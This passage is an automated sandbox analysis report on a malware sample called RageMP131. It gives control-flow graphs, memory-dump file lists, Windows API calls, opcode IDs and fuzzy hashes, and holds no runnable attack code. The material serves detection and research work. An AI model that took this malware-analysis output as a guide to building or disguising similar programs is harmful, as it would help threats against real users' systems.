477->486 481->463 482 3b489b-3b48b3 481->482 503 3b48b5-3b48ba 482->503 504 3b48d4-3b48dd 482->504 493 3b48bb-3b48c1 call 3ad1e5 483->493 494 3b4984-3b4986 483->494 484->468 491 3b4920-3b4930 call 3b4335 485->491 492 3b4937-3b4944 485->492 486->445 511 3b4933-3b4935 491->511 500 3b4950-3b4955 call 3b417b 492->500 501 3b4946 call 3b448c 492->501 493->468 494->473 512 3b494b-3b494e 500->512 501->512 503->493 504->476 511->473 512->511
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9dd322dfb9335e76631b75594efa328453792d8a2e061105e0e4c129f1bfca14
                                  • Instruction ID: a496502764fd570d71c580340c9f0ed5a2db584216c8e175bd51c5b4dd560d28
                                  • Opcode Fuzzy Hash: 9dd322dfb9335e76631b75594efa328453792d8a2e061105e0e4c129f1bfca14
                                  • Instruction Fuzzy Hash: AAB11270A00249AFDB13DFA8D841BFEBBB5EF86308F154158E641ABA83C7719D41CB64

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 550 2ca210-2ca2ab call 39f290 call 2c2ae0 555 2ca2b0-2ca2bb 550->555 555->555 556 2ca2bd-2ca2c8 555->556 557 2ca2cd-2ca2de call 3a5362 556->557 558 2ca2ca 556->558 561 2ca2e0-2ca305 call 3a9136 call 3a4eeb call 3a9136 557->561 562 2ca351-2ca357 557->562 558->557 580 2ca30c-2ca316 561->580 581 2ca307 561->581 564 2ca359-2ca365 562->564 565 2ca381-2ca393 562->565 567 2ca377-2ca37e call 39f511 564->567 568 2ca367-2ca375 564->568 567->565 568->567 570 2ca394-2ca3ae call 3a47b0 568->570 577 2ca3b0-2ca3bb 570->577 577->577 579 2ca3bd-2ca3c8 577->579 582 2ca3cd-2ca3df call 3a5362 579->582 583 2ca3ca 579->583 584 2ca328-2ca32f call 32cf60 580->584 585 2ca318-2ca31c 580->585 581->580 594 2ca3fc-2ca403 582->594 595 2ca3e1-2ca3f9 call 3a9136 call 3a4eeb call 3a8be8 582->595 583->582 590 2ca334-2ca33a 584->590 586 2ca31e 585->586 587 2ca320-2ca326 585->587 586->587 587->590 592 2ca33c 590->592 593 2ca33e-2ca349 call 3adbdf call 3a8be8 590->593 592->593 610 2ca34e 593->610 596 2ca42d-2ca433 594->596 597 2ca405-2ca411 594->597 595->594 600 2ca423-2ca42a call 39f511 597->600 601 2ca413-2ca421 597->601 600->596 601->600 604 2ca434-2ca45e call 3a47b0 601->604 617 2ca46f-2ca474 604->617 618 2ca460-2ca464 604->618 610->562 618->617 619 2ca466-2ca46e 618->619
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID:
                                  • API String ID: 2638373210-0
                                  • Opcode ID: 08f1aa8b8f2f1b8912de4617c306bf37e9fc4f227ce84ee2f49d6ab5b1134b01
                                  • Instruction ID: a00e3e123af81a0e42c399a2ecbdcf23a7ac393f14bb7b3a79e6b83304b67baa
                                  • Opcode Fuzzy Hash: 08f1aa8b8f2f1b8912de4617c306bf37e9fc4f227ce84ee2f49d6ab5b1134b01
                                  • Instruction Fuzzy Hash: 2D716A70910248AFDB19DF68CC45FAFB7E8EF42304F10866DF8099B682D7B59941C792

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 620 3b549c-3b54be 621 3b56b1 620->621 622 3b54c4-3b54c6 620->622 625 3b56b3-3b56b7 621->625 623 3b54c8-3b54e7 call 3a4723 622->623 624 3b54f2-3b5515 622->624 631 3b54ea-3b54ed 623->631 627 3b551b-3b5521 624->627 628 3b5517-3b5519 624->628 627->623 630 3b5523-3b5534 627->630 628->627 628->630 632 3b5547-3b5557 call 3b4fe1 630->632 633 3b5536-3b5544 call 3ae17d 630->633 631->625 638 3b5559-3b555f 632->638 639 3b55a0-3b55b2 632->639 633->632 640 3b5588-3b559e call 3b4bb2 638->640 641 3b5561-3b5564 638->641 642 3b5609-3b5629 WriteFile 639->642 643 3b55b4-3b55ba 639->643 662 3b5581-3b5583 640->662 644 3b556f-3b557e call 3b4f79 641->644 645 3b5566-3b5569 641->645 647 3b562b-3b5631 642->647 648 3b5634 642->648 649 3b55bc-3b55bf 643->649 650 3b55f5-3b5607 call 3b505e 643->650 644->662 645->644 651 3b5649-3b564c 645->651 647->648 655 3b5637-3b5642 648->655 656 3b55e1-3b55f3 call 3b5222 649->656 657 3b55c1-3b55c4 649->657 671 3b55dc-3b55df 650->671 658 3b564f-3b5651 651->658 664 3b56ac-3b56af 655->664 665 3b5644-3b5647 655->665 656->671 657->658 666 3b55ca-3b55d7 call 3b5139 657->666 668 3b567f-3b568b 658->668 669 3b5653-3b5658 658->669 662->655 664->625 665->651 666->671 674 3b568d-3b5693 668->674 675 3b5695-3b56a7 668->675 672 3b565a-3b566c 669->672 673 3b5671-3b567a call 3ad208 669->673 671->662 672->631 673->631 674->621 674->675 675->631
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000000,003A9087,?,00000000,00000000,00000000,?,00000000,?,002CA3EB,003A9087,00000000,002CA3EB,?,?), ref: 003B5621
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: fabb9356c4dce4825e087b92e7564e55e12dbaf77b68223222400de3b131a096
                                  • Instruction ID: e245f98e6f6d04caf1e4f4dd57ec45e133d404ccb9456949b9da43e00a2c3f08
                                  • Opcode Fuzzy Hash: fabb9356c4dce4825e087b92e7564e55e12dbaf77b68223222400de3b131a096
                                  • Instruction Fuzzy Hash: 5261A371D00519AFDF12DFA8C845FEEBBB9EF59308F150145EA01AB655D371D901CBA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 678 3306c0-3306df 679 330802 call 2c2270 678->679 680 3306e5-3306f8 678->680 685 330807 call 2c21d0 679->685 682 330720-330728 680->682 683 3306fa 680->683 686 330731-330735 682->686 687 33072a-33072f 682->687 684 3306fc-330701 683->684 688 330704-33070f call 39f290 684->688 693 33080c-330840 call 3a47b0 call 3a5379 685->693 690 330737 686->690 691 330739-330741 686->691 687->684 688->693 702 330715-33071e 688->702 690->691 694 330743-330748 691->694 695 330750-330752 691->695 694->685 698 33074e 694->698 699 330761 695->699 700 330754-330755 call 39f290 695->700 698->688 701 330763-330782 699->701 708 33075a-33075f 700->708 705 330784-3307ae call 3a0f70 * 2 701->705 706 3307d9-3307ff call 3a0f70 * 2 701->706 702->701 718 3307c2-3307d6 call 39f511 705->718 719 3307b0-3307be 705->719 708->701 719->693 720 3307c0 719->720 720->718
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00330807
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: 72ae2a14724d4e83691c0531f3cf1eefdbecef984361d26ffcaed67d00a3d962
                                  • Instruction ID: c8bf2c818218b6886c3d9410c924f2f2938f0109db667c52f09d50c5b3bfcdd0
                                  • Opcode Fuzzy Hash: 72ae2a14724d4e83691c0531f3cf1eefdbecef984361d26ffcaed67d00a3d962
                                  • Instruction Fuzzy Hash: FB4128729001189FCB1AEF68DDC16AEB7A5EF45350F1502A9FC05EB341DB70AE508BE1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 723 330560-33057f 724 330585-330598 723->724 725 3306a9 call 2c2270 723->725 726 3305c0-3305c8 724->726 727 33059a 724->727 730 3306ae call 2c21d0 725->730 731 3305d1-3305d5 726->731 732 3305ca-3305cf 726->732 729 33059c-3305a1 727->729 733 3305a4-3305a5 call 39f290 729->733 738 3306b3-3306b8 call 3a47b0 730->738 735 3305d7 731->735 736 3305d9-3305e1 731->736 732->729 743 3305aa-3305af 733->743 735->736 739 3305e3-3305e8 736->739 740 3305f0-3305f2 736->740 739->730 745 3305ee 739->745 741 330601 740->741 742 3305f4-3305ff call 39f290 740->742 747 330603-330629 741->747 742->747 743->738 748 3305b5-3305be 743->748 745->733 751 330680-3306a6 call 3a0f70 call 3a14f0 747->751 752 33062b-330655 call 3a0f70 call 3a14f0 747->752 748->747 761 330657-330665 752->761 762 330669-33067d call 39f511 752->762 761->738 763 330667 761->763 763->762
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003306AE
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction ID: ecc22976a83301610031e09e5ea3c49feecf00cf758957440164320a3e431bee
                                  • Opcode Fuzzy Hash: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction Fuzzy Hash: 6B41F672A041149FCB1ADF68D99166E7BA9EF89310F150269FC05EB305D770DD608BE1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 766 3b4b12-3b4b26 call 3ba6de 769 3b4b28-3b4b2a 766->769 770 3b4b2c-3b4b34 766->770 771 3b4b7a-3b4b9a call 3ba64d 769->771 772 3b4b3f-3b4b42 770->772 773 3b4b36-3b4b3d 770->773 782 3b4bac 771->782 783 3b4b9c-3b4baa call 3ad208 771->783 776 3b4b60-3b4b70 call 3ba6de FindCloseChangeNotification 772->776 777 3b4b44-3b4b48 772->777 773->772 775 3b4b4a-3b4b5e call 3ba6de * 2 773->775 775->769 775->776 776->769 785 3b4b72-3b4b78 776->785 777->775 777->776 787 3b4bae-3b4bb1 782->787 783->787 785->771
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003B49F9,00000000,CF830579,003F1140,0000000C,003B4AB5,003A8BBD,?), ref: 003B4B68
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 5b7730caa616b24931fa598cd3b356ea1aa453b306f1dbf4098addb9780e694b
                                  • Instruction ID: a8a0d0fb7392b0fe1b2a1ea8784d74267f4290aae1481a18c35eb88e19a780eb
                                  • Opcode Fuzzy Hash: 5b7730caa616b24931fa598cd3b356ea1aa453b306f1dbf4098addb9780e694b
                                  • Instruction Fuzzy Hash: CD114833A4451416DA27A2346802BFE6B498BC277CF2B0209FB889BDD3EE60DC41429D
                                  APIs
                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,003F0DF8,002CA3EB,00000002,002CA3EB,00000000,?,?,?,003AE166,00000000,?,002CA3EB,00000002,003F0DF8), ref: 003AE098
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 2e6d5ce1398ae5ac4221009854fb1974fb0771fb93a0230b53c4f0de03328614
                                  • Instruction ID: 77097ca0ee20c9accf77d2f0f3d6b9c3148e19342d5f2d9b0907866a61ce74ed
                                  • Opcode Fuzzy Hash: 2e6d5ce1398ae5ac4221009854fb1974fb0771fb93a0230b53c4f0de03328614
                                  • Instruction Fuzzy Hash: C801F932610559AFCF16DF6ACC05D9E3B29DB82334F250248F9919B2D1EAB1ED41CBD0
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,003A91F7,00000000,?,003B5D79,00000001,00000364,00000000,00000006,000000FF,?,00000000,003AD244,003A89C3,003A91F7,00000000), ref: 003B6435
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 09d8c2a1bff31d9820f263882116984f83ae1e7772d3841609f2c9534b73c46c
                                  • Instruction ID: ea1ee5ccf3cd3dd61f3603b5004e7549283b7fd164a67c13235fe57eae6cccfa
                                  • Opcode Fuzzy Hash: 09d8c2a1bff31d9820f263882116984f83ae1e7772d3841609f2c9534b73c46c
                                  • Instruction Fuzzy Hash: 14F0B431501924679B236B639C03BEB3B4C9F8176CF268011AE059AC82CE24D80186E1
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,003BD635,4D88C033,?,003BD635,00000220,?,003B57EF,4D88C033), ref: 003B6E60
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: a580f57ec31fa291a66ac021b8b8a82ac6972e665556a40e2809ad0bf9de45ab
                                  • Instruction ID: c398f954d106bc5601e8d7938234700b2a7fb90cd076246b8a5384e320de4b34
                                  • Opcode Fuzzy Hash: a580f57ec31fa291a66ac021b8b8a82ac6972e665556a40e2809ad0bf9de45ab
                                  • Instruction Fuzzy Hash: 70E0ED3910062266DA3322A5CE13BEB764CDF823A8F160520EF059AC92CF28C80087A4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154297826.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e20000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: _yo
                                  • API String ID: 0-1308214902
                                  • Opcode ID: 0679a0da29e504f1fbe0844da5e185ff899c48968ecf273b560e770ce545e2bb
                                  • Instruction ID: 6c6f7c1c387d230927c166b6ceb75a9379b8f6256bd42d03fec7926cbeedf87e
                                  • Opcode Fuzzy Hash: 0679a0da29e504f1fbe0844da5e185ff899c48968ecf273b560e770ce545e2bb
                                  • Instruction Fuzzy Hash: D0113AE764C230EED2428E8157406FA7B65EB976303306526F60BB7183F1952E49B571
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154297826.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e20000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f88b42e847d036b40114f8e76244828b3a42a2a0cc9eb2ac0890e2ef0ab7db3
                                  • Instruction ID: f26de1a354936684772003a723407bce72cf1a5e665c1090644bc3350f58da1a
                                  • Opcode Fuzzy Hash: 9f88b42e847d036b40114f8e76244828b3a42a2a0cc9eb2ac0890e2ef0ab7db3
                                  • Instruction Fuzzy Hash: 8A01D6DB288220AEE14299816B447F6BB79A7D76307706136F547F7183F2D42B497130
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154297826.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e20000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d70f69b9e5e13f52e88ceb6364c84dcea9659baf8005797f6a0b455c7aa04724
                                  • Instruction ID: 0676c88295ac25e8150aeb675ce894a20f0eed88a6d36e3e468f387ebf6d6671
                                  • Opcode Fuzzy Hash: d70f69b9e5e13f52e88ceb6364c84dcea9659baf8005797f6a0b455c7aa04724
                                  • Instruction Fuzzy Hash: FF01B5DB28C230BDE142898567446F67A69A3C7630370A126F607F6683F2D42F497131
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154297826.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e20000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18bcd079775b746d1441fb1dda913a7333cb4d7afdf472f313cb5d6938feeba6
                                  • Instruction ID: bf284451f1d97a1a6d1c55a7439a20248b1b366b26c2bb9fa32321fff5b7e847
                                  • Opcode Fuzzy Hash: 18bcd079775b746d1441fb1dda913a7333cb4d7afdf472f313cb5d6938feeba6
                                  • Instruction Fuzzy Hash: 54F04CD724C230EED242CA8457447F67BA5B7D76307306126F64BF6283F1992B097231
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154297826.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e20000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
